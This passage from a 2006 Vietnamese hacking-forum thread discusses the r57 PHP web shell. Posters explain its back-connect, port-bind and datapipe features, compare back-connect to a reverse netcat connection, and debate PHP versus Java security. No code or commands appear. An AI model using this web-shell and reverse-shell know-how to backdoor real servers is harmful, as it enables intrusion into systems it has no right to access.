
Nhân đây nói với mọi người là dùng r57 thiếu mất cái back-connect thì đã coi như bỏ qua một nửa tính năng của nó.

Dù sao script kiddie cũng có nhiều loại
[Up] [Print Copy]
  [Question]   Re: Site HVA có lỗi ? 15/07/2006 02:16:18 (+0700) | #51 | 6763
vietwow
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 13:15:47
Messages: 90
Offline
[Profile] [PM]
ủa, sao em nhớ r57 có 1 bản thôi mà bác luke, trước giờ em muốn xài tiếng Anh hay tiếng Nga thì chỉ cần sửa cái biến đầu tiên trong code cùa nó thành 'ru' hay 'eng' là xong à
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 15/07/2006 02:38:04 (+0700) | #52 | 6771
[Avatar]
Luke
Elite Member

[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Luke có 2 bản khác nhau smilie
1 cái hình như của VN thấy còn có chữ meocon8ya gì nữa
Quảng cáo tùm lum về cc, pp ^_^
[Up] [Print Copy]
  [Question]   Re: Site HVA có lỗi ? 15/07/2006 03:56:49 (+0700) | #53 | 6799
vietwow
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 13:15:47
Messages: 90
Offline
[Profile] [PM]
Bác luke cho em hỏi chức năng back-connect có phải là chức năng mở port trên server bị cài backdoor và connect ngược từ máy mình vào sever đó ko vậy ? Nếu chỉ vậy thì em nghĩ nc làm được rồi (telnet nghịch đảo), tại sao cần phải kết hợp nc với kỹ thuật back-end này ? Em nghe bác nói về chức năng này hay wa', rất muốn tìm hiểu mà chưa search được tài liệu về cái này, nếu được bác nói kỹ hơn 1 chút cho em bít lun với
Thanx

p/s : bác thử post con r57 có chức năng back-end cho m5oi người xem luôn cái, em lên homepage của nó mà cũng thấy có 1 version à
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 15/07/2006 07:50:37 (+0700) | #54 | 6843
[Avatar]
LeonHart
HVA Friend

Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
[Profile] [PM]
Lâu rồi HVA mới có bài thảo luận hay, tớ đã học thêm đc nhiều điều từ vấn đề này. Keep working smilie
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 18/07/2006 07:57:23 (+0700) | #55 | 7604
[Avatar]
mudzot
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 14:41:27
Messages: 76
Offline
[Profile] [PM]
Hê, sao lại chuyển qua bàn luận về r57 mất rồi. Tớ có vài ý kiến
- r57shell chỉ được phát hành 1 bản, tiếng anh hay nga là phụ thuộc vào biến lang = ru hay eng và chức năng thì hoàn toàn như nhau, còn "bản của vn" thì tớ chịu chưa thấy bao giờ.
- 3 chức năng mà luke nhắc tới có lẽ là port bind, back connect và datapipe, 3 chức năng này được gắn kèm source c và perl trong file php dưới dạng base64, nên mới có mấy cái biến giun dế trong file r57shell.
- Nội dung biến $datapipe_pl mà Luke trích dẫn là để tạo 1 cái pipe, đúng hơn là tunnel trên host đó, lắng nghe trên cổng $localport và dẫn truyền data từ đó tới remotehost:remoteport
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 24/07/2006 08:50:25 (+0700) | #56 | 9460
duclong_tran0204
Member

[Minus]    0    [Plus]
Joined: 19/07/2006 11:36:09
Messages: 10
Location: Matrix
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Mấy pác giỏi wa cho em xin chữ kí đi ạ
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 24/07/2006 23:09:07 (+0700) | #57 | 9578
LNS
Member

[Minus]    0    [Plus]
Joined: 14/07/2006 18:07:38
Messages: 50
Offline
[Profile] [PM]

conmale wrote:
Functional bugs --> làm cho 1 hoặc nhiều chức năng không thể thực thi. Functional bugs xảy ra ở trạng thái involuntary.

Security bugs --> chức năng đã được thực thi nhưng có thể làm cho nó "đổi thái độ", dẫn đến việc tạo lỗ hổng hoặc nhân nhượng dịch vụ. Security bugs xảy ra ở trạng thái calculated.  


Đây giống lập trình trạng thái thiệt, nhưng lại dành cho webpage. Thật sự có ko? Em mới nghe nói nhưng ko rõ nên confirm cho "an toàn info". smilie smilie


Có funct bug (nhỏ xíu) ở HVA, giả sử em dùng chức năng "Xem trước" (Preview) đoạn trên của bài viết này thì thấy: Code:
<cite>conmale wrote:</cite>
<blockquote>Functional bugs --> làm cho 1 hoặc nhiều chức năng không thể thực thi. Functional bugs xảy ra ở trạng thái involuntary. 

Security bugs --> chức năng đã được thực thi nhưng có thể làm cho nó "đổi thái độ", dẫn đến việc tạo lỗ hổng hoặc nhân nhượng dịch vụ. Security bugs xảy ra ở trạng thái calculated.   </blockquote> 

Đây giống lập trình trạng thái thiệt, nhưng lại dành cho webpage. Thật sự có ko? Em mới nghe nói nhưng ko rõ nên confirm cho "an toàn info". smilie smilie

Nhận thấy: không preview được phần QUOTE, nhưng khi View thì vẫn okie.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 08/08/2006 09:44:38 (+0700) | #58 | 13115
114v
Member

[Minus]    0    [Plus]
Joined: 08/07/2006 23:27:00
Messages: 191
Offline
[Profile] [PM]

conmale wrote:

chuotkhongrang wrote:
Vâng em biết là ngôn ngữ nào lập trình nếu mình không viết 1 cách chặc chẽ sẽ bị lỗi nhưng theo em thấy khi mình viết java khi mình dùng một biến nào đó thì mình cần phải định nghĩa nó còn không thì không dùng được còn đối với php thì các sử dụng biến có vẻ thoải mái hơn(em chưa học php chi nghe người ta nói) vì việc sử dụng biết có vẻ thoải mái này khiến cho người lập trình trong lúc viết chương trình đôi khi ko định nghĩa vẫn sử dụng được và thía nếu 1 hacker biết được điểm này họ sẽ khai thác được nếu họ định nghĩa lại biến đó(ví dụ up 1 con r57 chẳng hạn (vniss chuyên gia sử dụng mấy cái này hihi)).
 

Tính linh động và mạnh mẽ của một ngôn ngữ lập trình không chỉ dừng lại ở chỗ dùng "biến". So sánh php và java thì hơi khập khiễng vì php nặng procedural, pseduo-object oriented. Trong khi đó, java là true OO. Vấn đề "thoải mái" hay không còn đụng chạm đến chuyện thành thạo + quen dùng một ngôn ngữ nữa. So sánh không có khuôn khổ, thang bực thì không khéo trật chìa.

chuotkhongrang wrote:

Anh Comale tại sao người ta nói java có tính bảo mật cao hơn với so với ngôn ngữ lập trình khác.
 

Hì, tại sao em không thử tìm hiểu xem? smilie

"Nghe người ta nói" là điều nên tránh xa, nhất là đối với dân lập trình + bảo mật.

Nói về mặt kỹ thuật, java là ngôn ngữ có data type rất cụ thể và chặc chẽ. Em có thể "cast" type nhưng không phải là cast thế nào cũng được. Riêng chuyện "java bảo mật hơn" thì anh đã trả lời trong bài trước. Nói lại 1 lần nữa: chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng. 


Theo em thấy thì khi đã OOP thì cái gì cũng chậm thêm cả, làm gì có chuyện bộ nhớ lưu nhiều hơn lại nhanh hơn so với bộ nhớ lưu ít hơn
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 08/08/2006 18:32:30 (+0700) | #59 | 13203
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

114v wrote:

conmale wrote:

chuotkhongrang wrote:
Vâng em biết là ngôn ngữ nào lập trình nếu mình không viết 1 cách chặc chẽ sẽ bị lỗi nhưng theo em thấy khi mình viết java khi mình dùng một biến nào đó thì mình cần phải định nghĩa nó còn không thì không dùng được còn đối với php thì các sử dụng biến có vẻ thoải mái hơn(em chưa học php chi nghe người ta nói) vì việc sử dụng biết có vẻ thoải mái này khiến cho người lập trình trong lúc viết chương trình đôi khi ko định nghĩa vẫn sử dụng được và thía nếu 1 hacker biết được điểm này họ sẽ khai thác được nếu họ định nghĩa lại biến đó(ví dụ up 1 con r57 chẳng hạn (vniss chuyên gia sử dụng mấy cái này hihi)).
 

Tính linh động và mạnh mẽ của một ngôn ngữ lập trình không chỉ dừng lại ở chỗ dùng "biến". So sánh php và java thì hơi khập khiễng vì php nặng procedural, pseduo-object oriented. Trong khi đó, java là true OO. Vấn đề "thoải mái" hay không còn đụng chạm đến chuyện thành thạo + quen dùng một ngôn ngữ nữa. So sánh không có khuôn khổ, thang bực thì không khéo trật chìa.

chuotkhongrang wrote:

Anh Comale tại sao người ta nói java có tính bảo mật cao hơn với so với ngôn ngữ lập trình khác.
 

Hì, tại sao em không thử tìm hiểu xem? smilie

"Nghe người ta nói" là điều nên tránh xa, nhất là đối với dân lập trình + bảo mật.

Nói về mặt kỹ thuật, java là ngôn ngữ có data type rất cụ thể và chặc chẽ. Em có thể "cast" type nhưng không phải là cast thế nào cũng được. Riêng chuyện "java bảo mật hơn" thì anh đã trả lời trong bài trước. Nói lại 1 lần nữa: chương trình có bảo mật hay không là do người tạo ra nó chớ chẳng phải do loại ngôn ngữ lập trình họ dùng. 


Theo em thấy thì khi đã OOP thì cái gì cũng chậm thêm cả, làm gì có chuyện bộ nhớ lưu nhiều hơn lại nhanh hơn so với bộ nhớ lưu ít hơn 


Hì hì, OOP thì cái gì cũng chậm thêm? Ai bảo em như vậy hay em thật sự rút tỉa thực tế như vậy?

Ai nói chuyện bộ nhớ lưu nhiều hơn thì nhanh hay chậm hơn hồi nào vậy?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Site HVA có lỗi ? 09/08/2006 03:20:43 (+0700) | #60 | 13294
hack2prison
Member

[Minus]    0    [Plus]
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
[Profile] [PM]
bảo mật tốt hay không là do người lập trình chứ không phải do ngôn ngữ, giống như học giỏi hay không là do người học chứ không phải do môn học 

Thứ nhất chưa có tài liệu nào nói thể dục nhiều người giỏi hơn môn toán 

Thứ hai giả sử có đi nữa thì cũng do nhiều người thích môn thể dục hơn môn toán hoặc do có nhiều người có năng khiếu thể dục hơn là toán học chứ không phải tại môn thể dục dễ hơn môn toán 

Vickizw nói chính xác nhưng vẫn có cái chưa đúng, không phải người ta thích môn toán nhiều hơn môn thể dục. Theo tớ nhiều người thích đếm tiền hơn làm việc. Làm việc (tập thể dục đó) còn Đếm tiền (toán đó chứ đâu) smilie) smilie
Còn chuột không răng gì đó nói trật lất. Tôi phân tích cho nghe nhé:
Tui hỏi ông nha tại sao môn "thể dục" có nhiều người học giỏi hơn môn "toán" 

Ai nói thể dục có nhiều người giỏi hơn môn toán. Giỏi là thế nào nhỉ, học môn đó đạt điểm 8,9 là giỏi sao? Giỏi nghĩa là hơn người kìa(???) Đi thi olimpic coi đoạt giải không???
Trong lớp cậu có 50 học sinh đi, 50 học sinh cùng đạt 8 điểm có được gọi là giỏi không? Ngày xưa môn giáo dục thể chất, thi môn đá bóng tớ được điểm A (từ 9-10 điểm) trong khi chẳng biết đá chi cả. Vậy cậu kêu tớ giỏi đá bóng sao? Chắc sang Barcelona cạnh tranh vị trí với Ronaldinho quá. smilie

Hì hì, hay lắm... làm "bằng tay" hả? 


Cha conmale cố tình đưa cái dấu ngoặc kép ác thật. smilie) smilie Mấy chú mới lớn hay làm vậy mà smilie)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|